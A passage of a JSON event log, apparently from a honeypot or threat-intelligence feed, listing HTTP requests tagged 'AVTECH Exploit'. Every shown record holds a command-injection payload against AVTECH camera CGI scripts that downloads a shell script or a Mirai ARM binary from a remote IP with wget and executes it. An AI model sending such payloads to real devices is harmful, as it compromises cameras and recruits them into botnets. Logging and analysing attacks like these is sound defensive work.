8051.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh)&password=admin HTTP/1.1",
8052.       "post_data": "",
8053.       "target_port": 7547,
8054.       "protocol": "tcp",
8055.       "tags": [
8056.         {
8057.           "cve": "",
8058.           "category": "IoT",
8059.           "description": "AVTECH Exploit"
8060.         }
8061.       ],
8062.       "event_count": 1,
8063.       "first_seen": "2020-06-01T00:36:09Z",
8064.       "last_seen": "2020-06-01T00:36:09Z"
8065.     },
8066.     {
8067.       "event_id": "5e21740462d98af5515d18a676c5ecfbbe024ce81a36c0b819f0dd048d7910cb",
8068.       "source_ip_address": "35.193.32.21",
8069.       "country": "US",
8070.       "user_agent": "Snickers-Avtech",
8071.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh)&password=admin HTTP/1.1",
8072.       "post_data": "",
8073.       "target_port": 7001,
8074.       "protocol": "tcp",
8075.       "tags": [
8076.         {
8077.           "cve": "",
8078.           "category": "IoT",
8079.           "description": "AVTECH Exploit"
8080.         }
8081.       ],
8082.       "event_count": 1,
8083.       "first_seen": "2020-06-01T00:36:07Z",
8084.       "last_seen": "2020-06-01T00:36:07Z"
8085.     },
8086.     {
8087.       "event_id": "1300c0669cf0c6246e3c7d6525a0373ef782b6300d9902f2360ce264ed8e21d1",
8088.       "source_ip_address": "35.193.32.21",
8089.       "country": "US",
8090.       "user_agent": "Snickers-Avtech",
8091.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh; echo snickers_was_here HTTP/1.1",
8092.       "post_data": "",
8093.       "target_port": 8291,
8094.       "protocol": "tcp",
8095.       "tags": [
8096.         {
8097.           "cve": "",
8098.           "category": "IoT",
8099.           "description": "AVTECH Exploit"
8100.         }
8101.       ],
8102.       "event_count": 1,
8103.       "first_seen": "2020-06-01T00:35:46Z",
8104.       "last_seen": "2020-06-01T00:35:46Z"
8105.     },
8106.     {
8107.       "event_id": "6cab9ce13a7a1c2db4a2b743cece3deb7200184f9a7e76c87b96a278571cc4ee",
8108.       "source_ip_address": "35.193.32.21",
8109.       "country": "US",
8110.       "user_agent": "Snickers-Avtech",
8111.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh)&password=admin HTTP/1.1",
8112.       "post_data": "",
8113.       "target_port": 8291,
8114.       "protocol": "tcp",
8115.       "tags": [
8116.         {
8117.           "cve": "",
8118.           "category": "IoT",
8119.           "description": "AVTECH Exploit"
8120.         }
8121.       ],
8122.       "event_count": 1,
8123.       "first_seen": "2020-06-01T00:35:44Z",
8124.       "last_seen": "2020-06-01T00:35:44Z"
8125.     },
8126.     {
8127.       "event_id": "f919e6d01aeea2286eccd3d0d78f942159d31650730f977c1b710a6f09990cb7",
8128.       "source_ip_address": "35.193.32.21",
8129.       "country": "US",
8130.       "user_agent": "Snickers-Avtech",
8131.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh; echo snickers_was_here HTTP/1.1",
8132.       "post_data": "",
8133.       "target_port": 8888,
8134.       "protocol": "tcp",
8135.       "tags": [
8136.         {
8137.           "cve": "",
8138.           "category": "IoT",
8139.           "description": "AVTECH Exploit"
8140.         }
8141.       ],
8142.       "event_count": 1,
8143.       "first_seen": "2020-06-01T00:35:38Z",
8144.       "last_seen": "2020-06-01T00:35:38Z"
8145.     },
8146.     {
8147.       "event_id": "86927cd2c8b7adf02c5cf2e52f9f47e8e098d59b04d0ea536d3ffe4e07661420",
8148.       "source_ip_address": "35.193.32.21",
8149.       "country": "US",
8150.       "user_agent": "Snickers-Avtech",
8151.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 1.8UsA.sh; chmod 777 1.8UsA.sh; sh 1.8UsA.sh)&password=admin HTTP/1.1",
8152.       "post_data": "",
8153.       "target_port": 8888,
8154.       "protocol": "tcp",
8155.       "tags": [
8156.         {
8157.           "cve": "",
8158.           "category": "IoT",
8159.           "description": "AVTECH Exploit"
8160.         }
8161.       ],
8162.       "event_count": 1,
8163.       "first_seen": "2020-06-01T00:35:36Z",
8164.       "last_seen": "2020-06-01T00:35:36Z"
8165.     },
8166.     {
8167.       "event_id": "a0805bd6c1c897f2c6cf98e3ff3ab8ea28f89db913f9db9ad2d87a04cb1e785f",
8168.       "source_ip_address": "35.193.32.21",
8169.       "country": "US",
8170.       "user_agent": "Snickers-Avtech",
8171.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
8172.       "post_data": "",
8173.       "target_port": 8089,
8174.       "protocol": "tcp",
8175.       "tags": [
8176.         {
8177.           "cve": "",
8178.           "category": "IoT",
8179.           "description": "AVTECH Exploit"
8180.         }
8181.       ],
8182.       "event_count": 3,
8183.       "first_seen": "2020-05-31T22:45:48Z",
8184.       "last_seen": "2020-05-31T23:00:33Z"
8185.     },
8186.     {
8187.       "event_id": "7aa5002cfc755896c89dd24f2a27a87bc44b38b3f620a718c697e6960a407aa5",
8188.       "source_ip_address": "35.193.32.21",
8189.       "country": "US",
8190.       "user_agent": "Snickers-Avtech",
8191.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
8192.       "post_data": "",
8193.       "target_port": 2375,
8194.       "protocol": "tcp",
8195.       "tags": [
8196.         {
8197.           "cve": "",
8198.           "category": "IoT",
8199.           "description": "AVTECH Exploit"
8200.         }
8201.       ],
8202.       "event_count": 4,
8203.       "first_seen": "2020-05-31T22:36:42Z",
8204.       "last_seen": "2020-05-31T22:59:30Z"
8205.     },
8206.     {
8207.       "event_id": "cd10b9f43fac6af92783e29557ab7297d31e876dfceba1d41f7fba3eda85d27b",
8208.       "source_ip_address": "35.193.32.21",
8209.       "country": "US",
8210.       "user_agent": "Snickers-Avtech",
8211.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
8212.       "post_data": "",
8213.       "target_port": 9000,
8214.       "protocol": "tcp",
8215.       "tags": [
8216.         {
8217.           "cve": "",
8218.           "category": "IoT",
8219.           "description": "AVTECH Exploit"
8220.         }
8221.       ],
8222.       "event_count": 2,
8223.       "first_seen": "2020-05-31T22:41:06Z",
8224.       "last_seen": "2020-05-31T22:59:30Z"
8225.     },
8226.     {
8227.       "event_id": "48f860ad13ef904aea2643397438b5392cd7b318067814434587959ad75b1ef6",
8228.       "source_ip_address": "35.193.32.21",
8229.       "country": "US",
8230.       "user_agent": "Snickers-Avtech",
8231.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
8232.       "post_data": "",
8233.       "target_port": 16992,
8234.       "protocol": "tcp",
8235.       "tags": [
8236.         {
8237.           "cve": "",
8238.           "category": "IoT",
8239.           "description": "AVTECH Exploit"
8240.         }
8241.       ],
8242.       "event_count": 1,
8243.       "first_seen": "2020-05-31T22:57:17Z",
8244.       "last_seen": "2020-05-31T22:57:17Z"
8245.     },
8246.     {
8247.       "event_id": "ecc522117abeb0c49147a0d3defe88de2852ec61455b44d32a6c9a8f4de3c189",
8248.       "source_ip_address": "35.193.32.21",
8249.       "country": "US",
8250.       "user_agent": "Snickers-Avtech",
8251.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
8252.       "post_data": "",
8253.       "target_port": 5900,
8254.       "protocol": "tcp",
8255.       "tags": [
8256.         {
8257.           "cve": "",
8258.           "category": "IoT",
8259.           "description": "AVTECH Exploit"
8260.         }
8261.       ],
8262.       "event_count": 2,
8263.       "first_seen": "2020-05-31T22:48:02Z",
8264.       "last_seen": "2020-05-31T22:57:13Z"
8265.     },
8266.     {
8267.       "event_id": "8d34ac782d9fe1dacc9d10f82e2cc96b47adf7d18f6a00178ca05527f04d5884",
8268.       "source_ip_address": "35.193.32.21",
8269.       "country": "US",
8270.       "user_agent": "Snickers-Avtech",
8271.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
8272.       "post_data": "",
8273.       "target_port": 2087,
8274.       "protocol": "tcp",
8275.       "tags": [
8276.         {
8277.           "cve": "",
8278.           "category": "IoT",
8279.           "description": "AVTECH Exploit"
8280.         }
8281.       ],
8282.       "event_count": 1,
8283.       "first_seen": "2020-05-31T22:56:57Z",
8284.       "last_seen": "2020-05-31T22:56:57Z"
8285.     },
8286.     {
8287.       "event_id": "76db7cd4ee6a655bed0ec26361c1022e1448f5b3f1df69714f4dfb0e03db094b",
8288.       "source_ip_address": "35.193.32.21",
8289.       "country": "US",
8290.       "user_agent": "Snickers-Avtech",
8291.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
8292.       "post_data": "",
8293.       "target_port": 5269,
8294.       "protocol": "tcp",
8295.       "tags": [
8296.         {
8297.           "cve": "",
8298.           "category": "IoT",
8299.           "description": "AVTECH Exploit"
8300.         }
8301.       ],
8302.       "event_count": 1,
8303.       "first_seen": "2020-05-31T22:52:16Z",
8304.       "last_seen": "2020-05-31T22:52:16Z"
8305.     },
8306.     {
8307.       "event_id": "ee02438f7fd8d6c0bb97de04b16f1486f3b706026fe7c80636805024cba59c66",
8308.       "source_ip_address": "35.193.32.21",
8309.       "country": "US",
8310.       "user_agent": "Snickers-Avtech",
8311.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av; echo snickers_was_here HTTP/1.1",
8312.       "post_data": "",
8313.       "target_port": 8791,
8314.       "protocol": "tcp",
8315.       "tags": [
8316.         {
8317.           "cve": "",
8318.           "category": "IoT",
8319.           "description": "AVTECH Exploit"
8320.         }
8321.       ],
8322.       "event_count": 1,
8323.       "first_seen": "2020-05-31T22:50:43Z",
8324.       "last_seen": "2020-05-31T22:50:43Z"
8325.     },
8326.     {
8327.       "event_id": "573ca3b75565fbcd1e9dd2a6cf09c00bf3c93fab379095925910212169818cfb",
8328.       "source_ip_address": "35.193.32.21",
8329.       "country": "US",
8330.       "user_agent": "Snickers-Avtech",
8331.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
8332.       "post_data": "",
8333.       "target_port": 8779,
8334.       "protocol": "tcp",
8335.       "tags": [
8336.         {
8337.           "cve": "",
8338.           "category": "IoT",
8339.           "description": "AVTECH Exploit"
8340.         }
8341.       ],
8342.       "event_count": 1,
8343.       "first_seen": "2020-05-31T22:50:42Z",
8344.       "last_seen": "2020-05-31T22:50:42Z"
8345.     },
8346.     {
8347.       "event_id": "a15f46098048cf1981053e9de5d69048ecd104592b432a02e8b5d20639008409",
8348.       "source_ip_address": "35.193.32.21",
8349.       "country": "US",
8350.       "user_agent": "Snickers-Avtech",
8351.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
8352.       "post_data": "",
8353.       "target_port": 8791,
8354.       "protocol": "tcp",
8355.       "tags": [
8356.         {
8357.           "cve": "",
8358.           "category": "IoT",
8359.           "description": "AVTECH Exploit"
8360.         }
8361.       ],
8362.       "event_count": 2,
8363.       "first_seen": "2020-05-31T22:36:48Z",
8364.       "last_seen": "2020-05-31T22:50:41Z"
8365.     },
8366.     {
8367.       "event_id": "31db9983adc5ea3f299c4f07b337dc145c9fc534f69ac29d1f22de78e8092105",
8368.       "source_ip_address": "35.193.32.21",
8369.       "country": "US",
8370.       "user_agent": "Snickers-Avtech",
8371.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av; echo snickers_was_here HTTP/1.1",
8372.       "post_data": "",
8373.       "target_port": 8000,
8374.       "protocol": "tcp",
8375.       "tags": [
8376.         {
8377.           "cve": "",
8378.           "category": "IoT",
8379.           "description": "AVTECH Exploit"
8380.         }
8381.       ],
8382.       "event_count": 1,
8383.       "first_seen": "2020-05-31T22:50:16Z",
8384.       "last_seen": "2020-05-31T22:50:16Z"
8385.     },
8386.     {
8387.       "event_id": "36ea58a6c6cdfc2b976f70bc45bc6c6f984e61eba1f992839629486f2840cb55",
8388.       "source_ip_address": "35.193.32.21",
8389.       "country": "US",
8390.       "user_agent": "Snickers-Avtech",
8391.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
8392.       "post_data": "",
8393.       "target_port": 8000,
8394.       "protocol": "tcp",
8395.       "tags": [
8396.         {
8397.           "cve": "",
8398.           "category": "IoT",
8399.           "description": "AVTECH Exploit"
8400.         }
8401.       ],
8402.       "event_count": 1,
8403.       "first_seen": "2020-05-31T22:50:15Z",
8404.       "last_seen": "2020-05-31T22:50:15Z"
8405.     },
8406.     {
8407.       "event_id": "5e7e658c42096815dc1bae1417fe0ba2e61800cd979b91b23554b7018a1f9780",
8408.       "source_ip_address": "35.193.32.21",
8409.       "country": "US",
8410.       "user_agent": "Snickers-Avtech",
8411.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
8412.       "post_data": "",
8413.       "target_port": 1400,
8414.       "protocol": "tcp",
8415.       "tags": [
8416.         {
8417.           "cve": "",
8418.           "category": "IoT",
8419.           "description": "AVTECH Exploit"
8420.         }
8421.       ],
8422.       "event_count": 1,
8423.       "first_seen": "2020-05-31T22:49:48Z",
8424.       "last_seen": "2020-05-31T22:49:48Z"
8425.     },
8426.     {
8427.       "event_id": "1404a9a75d3efafcc0134f3aa1b82d4a0df9ea6ba25e76c6d005dc92aa8d8f3a",
8428.       "source_ip_address": "35.193.32.21",
8429.       "country": "US",
8430.       "user_agent": "Snickers-Avtech",
8431.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
8432.       "post_data": "",
8433.       "target_port": 2083,
8434.       "protocol": "tcp",
8435.       "tags": [
8436.         {
8437.           "cve": "",
8438.           "category": "IoT",
8439.           "description": "AVTECH Exploit"
8440.         }
8441.       ],
8442.       "event_count": 2,
8443.       "first_seen": "2020-05-31T22:36:40Z",
8444.       "last_seen": "2020-05-31T22:47:43Z"
8445.     },
8446.     {
8447.       "event_id": "1657dbee6b5f56eb654e68dd7cfd988f76d8db77bcaa65f8b3c206fd25a6385a",
8448.       "source_ip_address": "35.193.32.21",
8449.       "country": "US",
8450.       "user_agent": "Snickers-Avtech",
8451.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
8452.       "post_data": "",
8453.       "target_port": 5555,
8454.       "protocol": "tcp",
8455.       "tags": [
8456.         {
8457.           "cve": "",
8458.           "category": "IoT",
8459.           "description": "AVTECH Exploit"
8460.         }
8461.       ],
8462.       "event_count": 2,
8463.       "first_seen": "2020-05-31T22:34:19Z",
8464.       "last_seen": "2020-05-31T22:46:20Z"
8465.     },
8466.     {
8467.       "event_id": "2c0c0a0e5f369651b30462a4ce6b15b7ac7c4ce79c0493b50efc8b964ca9ef8f",
8468.       "source_ip_address": "35.193.32.21",
8469.       "country": "US",
8470.       "user_agent": "Snickers-Avtech",
8471.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av; echo snickers_was_here HTTP/1.1",
8472.       "post_data": "",
8473.       "target_port": 8443,
8474.       "protocol": "tcp",
8475.       "tags": [
8476.         {
8477.           "cve": "",
8478.           "category": "IoT",
8479.           "description": "AVTECH Exploit"
8480.         }
8481.       ],
8482.       "event_count": 2,
8483.       "first_seen": "2020-05-31T22:31:47Z",
8484.       "last_seen": "2020-05-31T22:46:20Z"
8485.     },
8486.     {
8487.       "event_id": "bdc950909997dfc151f3dc2504a3dba671fc6c70ae84674b5b401bebcd3e925b",
8488.       "source_ip_address": "35.193.32.21",
8489.       "country": "US",
8490.       "user_agent": "Snickers-Avtech",
8491.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
8492.       "post_data": "",
8493.       "target_port": 8008,
8494.       "protocol": "tcp",
8495.       "tags": [
8496.         {
8497.           "cve": "",
8498.           "category": "IoT",
8499.           "description": "AVTECH Exploit"
8500.         }
8501.       ],
8502.       "event_count": 2,
8503.       "first_seen": "2020-05-31T22:41:33Z",
8504.       "last_seen": "2020-05-31T22:46:19Z"
8505.     },
8506.     {
8507.       "event_id": "4efc2db27104f2ac57faea8289c60f4f27a36bc16cae707da4dcb23d80371d68",
8508.       "source_ip_address": "35.193.32.21",
8509.       "country": "US",
8510.       "user_agent": "Snickers-Avtech",
8511.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
8512.       "post_data": "",
8513.       "target_port": 8443,
8514.       "protocol": "tcp",
8515.       "tags": [
8516.         {
8517.           "cve": "",
8518.           "category": "IoT",
8519.           "description": "AVTECH Exploit"
8520.         }
8521.       ],
8522.       "event_count": 2,
8523.       "first_seen": "2020-05-31T22:31:45Z",
8524.       "last_seen": "2020-05-31T22:46:18Z"
8525.     },
8526.     {
8527.       "event_id": "0e874bf008697b217e32f0a242db0b12fc575f73880dc3a6d974184db7790091",
8528.       "source_ip_address": "35.193.32.21",
8529.       "country": "US",
8530.       "user_agent": "Snickers-Avtech",
8531.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av; echo snickers_was_here HTTP/1.1",
8532.       "post_data": "",
8533.       "target_port": 4567,
8534.       "protocol": "tcp",
8535.       "tags": [
8536.         {
8537.           "cve": "",
8538.           "category": "IoT",
8539.           "description": "AVTECH Exploit"
8540.         }
8541.       ],
8542.       "event_count": 2,
8543.       "first_seen": "2020-05-31T22:34:33Z",
8544.       "last_seen": "2020-05-31T22:44:11Z"
8545.     },
8546.     {
8547.       "event_id": "0770a17cb4744fb02becff0baf88104f11e361f2e49ee2fa78c72d178cc2714f",
8548.       "source_ip_address": "35.193.32.21",
8549.       "country": "US",
8550.       "user_agent": "Snickers-Avtech",
8551.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
8552.       "post_data": "",
8553.       "target_port": 4567,
8554.       "protocol": "tcp",
8555.       "tags": [
8556.         {
8557.           "cve": "",
8558.           "category": "IoT",
8559.           "description": "AVTECH Exploit"
8560.         }
8561.       ],
8562.       "event_count": 2,
8563.       "first_seen": "2020-05-31T22:34:31Z",
8564.       "last_seen": "2020-05-31T22:44:09Z"
8565.     },
8566.     {
8567.       "event_id": "092d5593ae9bcca97b05cf1b91aeec55ac7d8334a43928bafd7d9f652fd7a54c",
8568.       "source_ip_address": "35.193.32.21",
8569.       "country": "US",
8570.       "user_agent": "Snickers-Avtech",
8571.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
8572.       "post_data": "",
8573.       "target_port": 80,
8574.       "protocol": "tcp",
8575.       "tags": [
8576.         {
8577.           "cve": "",
8578.           "category": "IoT",
8579.           "description": "AVTECH Exploit"
8580.         }
8581.       ],
8582.       "event_count": 1,
8583.       "first_seen": "2020-05-31T22:43:56Z",
8584.       "last_seen": "2020-05-31T22:43:56Z"
8585.     },
8586.     {
8587.       "event_id": "0836fdc6fb73bb41ba488b39c9449eb11c8c941588fa8ca7ec157c459fc7072a",
8588.       "source_ip_address": "35.193.32.21",
8589.       "country": "US",
8590.       "user_agent": "Snickers-Avtech",
8591.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
8592.       "post_data": "",
8593.       "target_port": 8009,
8594.       "protocol": "tcp",
8595.       "tags": [
8596.         {
8597.           "cve": "",
8598.           "category": "IoT",
8599.           "description": "AVTECH Exploit"
8600.         }
8601.       ],
8602.       "event_count": 1,
8603.       "first_seen": "2020-05-31T22:43:44Z",
8604.       "last_seen": "2020-05-31T22:43:44Z"
8605.     },
8606.     {
8607.       "event_id": "00d99b7d75270bd93c4f5bc7297c8c2d422218795a1b313238ca10dac20ba6b3",
8608.       "source_ip_address": "35.193.32.21",
8609.       "country": "US",
8610.       "user_agent": "Snickers-Avtech",
8611.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
8612.       "post_data": "",
8613.       "target_port": 10443,
8614.       "protocol": "tcp",
8615.       "tags": [
8616.         {
8617.           "cve": "",
8618.           "category": "IoT",
8619.           "description": "AVTECH Exploit"
8620.         }
8621.       ],
8622.       "event_count": 1,
8623.       "first_seen": "2020-05-31T22:42:04Z",
8624.       "last_seen": "2020-05-31T22:42:04Z"
8625.     },
8626.     {
8627.       "event_id": "53431d12c2f26cb61779da70e795bc4ae5fe64b9b9c0be7042cf618e8f414ff1",
8628.       "source_ip_address": "35.193.32.21",
8629.       "country": "US",
8630.       "user_agent": "Snickers-Avtech",
8631.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av; echo snickers_was_here HTTP/1.1",
8632.       "post_data": "",
8633.       "target_port": 7474,
8634.       "protocol": "tcp",
8635.       "tags": [
8636.         {
8637.           "cve": "",
8638.           "category": "IoT",
8639.           "description": "AVTECH Exploit"
8640.         }
8641.       ],
8642.       "event_count": 1,
8643.       "first_seen": "2020-05-31T22:42:02Z",
8644.       "last_seen": "2020-05-31T22:42:02Z"
8645.     },
8646.     {
8647.       "event_id": "511dfa1c0f3c2ab01d565f44062724dadb70fb99ad7758e4b57b6f3cd5af2896",
8648.       "source_ip_address": "35.193.32.21",
8649.       "country": "US",
8650.       "user_agent": "Snickers-Avtech",
8651.       "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
8652.       "post_data": "",
8653.       "target_port": 7474,
8654.       "protocol": "tcp",
8655.       "tags": [
8656.         {
8657.           "cve": "",
8658.           "category": "IoT",
8659.           "description": "AVTECH Exploit"
8660.         }
8661.       ],
8662.       "event_count": 1,
8663.       "first_seen": "2020-05-31T22:42:00Z",
8664.       "last_seen": "2020-05-31T22:42:00Z"
8665.     },
8666.     {
8667.       "event_id": "c8db4a17f6b61140da19023565cf9b077f7d36a82f78394f5665e1b685584f7b",
8668.       "source_ip_address": "35.193.32.21",
8669.       "country": "US",
8670.       "user_agent": "Snickers-Avtech",
8671.       "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av; echo snickers_was_here HTTP/1.1",
8672.       "post_data": "",
8673.       "target_port": 8123,
8674.       "protocol": "tcp",
8675.       "tags": [
8676.         {
8677.           "cve": "",
8678.           "category": "IoT",
8679.           "description": "AVTECH Exploit"
8680.         }
8681.       ],
8682.       "event_count": 1,
8683.       "first_seen": "2020-05-31T22:41:59Z",
8684.       "last_seen": "2020-05-31T22:41:59Z"
8685.     },
8686.     {
8687.       "event_id": "4e1c980dea436983ffae8ea641d8910e9b4a73e26f90ad42a41b437301a90e78",
